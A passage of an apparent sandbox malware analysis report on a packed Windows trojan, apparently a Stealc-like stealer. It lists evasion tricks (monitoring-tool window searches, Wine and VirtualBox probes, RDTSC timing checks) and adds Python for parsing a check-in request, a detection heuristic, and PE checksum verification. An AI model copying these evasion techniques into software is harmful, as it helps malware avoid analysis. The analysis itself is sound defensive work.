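    method, path, headers, body = parse_http_request(raw)
    match = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if not match:
        raise ValueError("no multipart boundary in Content-Type")
    fields = parse_multipart(body, match.group(1).encode("ascii"))
    info: Dict[str, Optional[str]] = {
        "method": method,
        "path": path,
        "host": headers.get("host"),
        "user_agent": headers.get("user-agent"),   # absent in the captured request
    }
    info.update({k: v.decode("latin-1") for k, v in fields.items()})
    return info


def looks_like_stealc_checkin(info: Dict[str, Optional[str]]) -> bool:
    """Heuristic built from this capture only (not the Suricata rule's logic):
    POST to a .php path, no User-Agent, and exactly the hwid + build fields."""
    form_fields = set(info) - {"method", "path", "host", "user_agent"}
    return (info["method"] == "POST"
            and (info["path"] or "").endswith(".php")
            and info["user_agent"] is None
            and form_fields == {"hwid", "build"})


if __name__ == "__main__":
    parsed = extract_checkin(CHECKIN_REQUEST)
    print(parsed)
    print("stealc-like check-in:", looks_like_stealc_checkin(parsed))
```

The Content-Length check matters when running this over a pcap extraction rather than the report's dump: a truncated or merged body yields garbage fields, and failing loudly is better than emitting a wrong hwid into an indicator list.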

              System Summary

Source: file.exe | Static PE information: section name: (blank/special characters)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank/special characters)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006E48B0
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A7F1D2
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A7A1D8
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A71ADF
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A7BBF6
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A80BC8
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_009B9CF6
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A6E46D
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00AE4D34
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A73552
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A74EFF
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A78633
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B7E7BB
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0098CF83
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A707D4
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A7D725
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A5CF30
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A82706
Source: C:\Users\user\Desktop\file.exe | Code function: String function 006C4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: vhjbpyvx ZLIB complexity 0.9944899974043311
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006E3A50: CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006DCAE0: CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XZLVHNGC.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1831936 > 1048576
Source: file.exe | Static PE information: Raw size of vhjbpyvx is bigger than: 0x100000 < 0x1a5600

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.6c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vhjbpyvx:EW;susocjsk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vhjbpyvx:EW;susocjsk:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006E6390: GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c30e9 should be: 0x1c00ed
Source: file.exe | Static PE information: section name: (blank/special characters)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank/special characters)
Source: file.exe | Static PE information: section name: vhjbpyvx
Source: file.exe | Static PE information: section name: susocjsk
Source: file.exe | Static PE information: section name: .taggant
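The "real checksum: 0x1c30e9 should be: 0x1c00ed" line above is the result of recomputing the PE CheckSum over the whole file and comparing it with the value stored in IMAGE_OPTIONAL_HEADER. The following Python is an added example, not Joe Sandbox code: it implements that computation (the algorithm CheckSumMappedFile uses, a carry-folded 32-bit sum with the CheckSum field excluded, folded to 16 bits and then added to the file length) and runs it over a constructed 160-byte header-only buffer, since the analysed sample is not included here. A stored value of 0 is the common "never set" case for ordinary executables; a non-zero mismatch, as in this report, means the header was rewritten after linking, which fits the packer behaviour (unpacking, entry point in .taggant) listed in this section.

```python
"""
Recompute the PE CheckSum the way the Windows loader does and compare it with
the value stored in the optional header. Added example, not Joe Sandbox code;
the sample PE below is a constructed minimal header, not the analysed file.
"""
import struct
from typing import NamedTuple


class ChecksumResult(NamedTuple):
    stored: int
    computed: int

    @property
    def consistent(self) -> bool:
        # A stored value of 0 means the linker never set one (common for
        # non-driver EXEs); only a non-zero mismatch indicates post-link edits.
        return self.stored == 0 or self.stored == self.computed


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (same in PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # 4-byte signature, 20-byte COFF header, then CheckSum at +0x40 of the optional header
    return pe_off + 4 + 20 + 0x40


def compute_pe_checksum(data: bytes) -> int:
    """PE CheckSum as used by the loader (CheckSumMappedFile algorithm)."""
    skip = checksum_field_offset(data) // 4
    padded = data + b"\0" * (-len(data) % 4)       # treat the file as whole DWORDs
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:                                # the CheckSum field itself is excluded
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:                         # fold the carry back in
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)         # fold to 16 bits
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)                         # plus the original file length


def check_pe_checksum(data: bytes) -> ChecksumResult:
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    return ChecksumResult(stored, compute_pe_checksum(data))


def build_minimal_pe(stored_checksum: int) -> bytes:
    """Constructed 160-byte 'PE' made of headers only, for demonstration."""
    buf = bytearray(160)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)          # e_lfanew: PE header at 0x40
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", buf, 0x40 + 24 + 0x40, stored_checksum)
    return bytes(buf)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe(0x1C30E9)
    result = check_pe_checksum(blob)
    print(f"stored 0x{result.stored:x}, computed 0x{result.computed:x}, "
          f"{'ok' if result.consistent else 'MISMATCH'}")
```

Run it with a file path to check a real sample; without arguments it demonstrates a mismatch on the constructed buffer. Because the CheckSum field is excluded from the sum, any stored value can be tested against the same computed result.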
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A470BD: push ebx; mov dword ptr [esp], ebp (at 0_2_00A470D1)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A470BD: push edi; mov dword ptr [esp], 3D75466Dh (at 0_2_00A47108)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A470BD: push 5A08FC72h; mov dword ptr [esp], edx (at 0_2_00A47122)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A470BD: push 13983107h; mov dword ptr [esp], edi (at 0_2_00A47165)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A470BD: push 5254201Bh; mov dword ptr [esp], eax (at 0_2_00A471C2)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A470BD: push esi; mov dword ptr [esp], 5334834Ah (at 0_2_00A471C6)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A470BD: push esi; mov dword ptr [esp], ebx (at 0_2_00A471DF)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A470BD: push 7A74EA96h; mov dword ptr [esp], esi (at 0_2_00A471F7)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A470BD: push ecx; mov dword ptr [esp], eax (at 0_2_00A47203)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_009CE0AE: push esi; mov dword ptr [esp], ecx (at 0_2_009CE0EF)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_009CE0AE: push edi; mov dword ptr [esp], edx (at 0_2_009CE138)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_009CE0AE: push edi; mov dword ptr [esp], esi (at 0_2_009CE206)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A8709D: push ebp; mov dword ptr [esp], esi (at 0_2_00A87101)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A8709D: push 2FF02BAAh; mov dword ptr [esp], eax (at 0_2_00A8714F)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00AF80EF: push eax; mov dword ptr [esp], 340C814Fh (at 0_2_00AF8216)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B328F5: push esi; mov dword ptr [esp], eax (at 0_2_00B328F9)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B328F5: push ecx; mov dword ptr [esp], edx (at 0_2_00B32923)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A6C0FF: push eax; mov dword ptr [esp], ecx (at 0_2_00A6C191)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A6C0FF: push ebx; mov dword ptr [esp], edx (at 0_2_00A6C1C8)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A6C0FF: push 58E28217h; mov dword ptr [esp], ebp (at 0_2_00A6C1ED)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A6C0FF: push ebx; mov dword ptr [esp], edi (at 0_2_00A6C204)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A6C0FF: push eax; mov dword ptr [esp], ecx (at 0_2_00A6C21F)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A6C0FF: push ebx; mov dword ptr [esp], ecx (at 0_2_00A6C250)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B2B0DA: push 65E885EBh; mov dword ptr [esp], eax (at 0_2_00B2B182)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B4E832: push 3CE53921h; mov dword ptr [esp], ecx (at 0_2_00B4EAA5)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B4E832: push edi; mov dword ptr [esp], ebx (at 0_2_00B4F2DD)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B00821 push ebp; mov dword ptr [esp], esi0_2_00B00846
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE4816 push edi; mov dword ptr [esp], eax0_2_00AE488E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912850 push edx; mov dword ptr [esp], 507D8A68h0_2_00913BF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912850 push 1668E80Fh; mov dword ptr [esp], edx0_2_00915B56
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912850 push 407AEDD1h; mov dword ptr [esp], ecx0_2_00915B6C
              Source: file.exeStatic PE information: section name: vhjbpyvx entropy: 7.952882497591057

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_006E6390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25786
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9100A2 second address: 9100A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7ED10 second address: A7ED14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7ED14 second address: A7ED18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A86C6B second address: A86C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A86C6F second address: A86C80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD320FBh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A86E00 second address: A86E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A86E04 second address: A86E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB10CD32109h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A86E27 second address: A86E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A86E2B second address: A86E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A86FBC second address: A86FC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A86FC5 second address: A86FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB10CD32101h 0x0000000e jmp 00007FB10CD320FDh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A86FEC second address: A86FFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB10CBE428Ah 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8AB1A second address: A8AB3B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB10CD32106h 0x00000008 jmp 00007FB10CD32100h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8AB3B second address: A8AB45 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8AB45 second address: A8AB4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8AC9C second address: A8ACA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8ACA0 second address: A8ACB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8AD47 second address: A8ADA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 70948F16h 0x0000000f push 00000003h 0x00000011 jmp 00007FB10CBE4295h 0x00000016 mov edi, ebx 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b xor eax, 53393774h 0x00000021 jnc 00007FB10CBE428Ch 0x00000027 popad 0x00000028 mov dword ptr [ebp+122D3821h], edx 0x0000002e push 00000003h 0x00000030 mov dl, EBh 0x00000032 add dword ptr [ebp+122D1B8Eh], edi 0x00000038 call 00007FB10CBE4289h 0x0000003d push eax 0x0000003e push edx 0x0000003f ja 00007FB10CBE4288h 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8ADA8 second address: A8ADDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32107h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c js 00007FB10CD320F6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 pop ecx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jl 00007FB10CD32104h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8ADDE second address: A8ADE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8ADE2 second address: A8AE0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jnl 00007FB10CD320FCh 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b jbe 00007FB10CD320F6h 0x00000021 pop edi 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8AE0A second address: A8AE0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9B99C second address: A9B9A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9B9A0 second address: A9B9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9B9A6 second address: A9B9AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A6DFA6 second address: A6DFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jp 00007FB10CBE4286h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA9B9F second address: AA9BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA9BA5 second address: AA9BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA9F91 second address: AA9FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FFh 0x00000009 pop edx 0x0000000a js 00007FB10CD320F8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB10CD32100h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA9FC4 second address: AA9FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA9FC8 second address: AA9FD2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB10CD320F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA9FD2 second address: AA9FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA9FD8 second address: AA9FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB10CD320F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAA147 second address: AAA14B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAA2C7 second address: AAA2CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAA585 second address: AAA58D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAA58D second address: AAA591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAA875 second address: AAA879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9FF84 second address: A9FF8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9FF8A second address: A9FF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9FF8E second address: A9FF9C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB10CD320F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9FF9C second address: A9FFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB10CBE4286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7B75F second address: A7B78D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32102h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FB10CD320F6h 0x0000000f jmp 00007FB10CD32102h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A7B78D second address: A7B793 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAB2CE second address: AAB2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jg 00007FB10CD320F6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAB2DA second address: AAB2FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB10CBE4294h 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAB2FD second address: AAB303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AAB303 second address: AAB308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
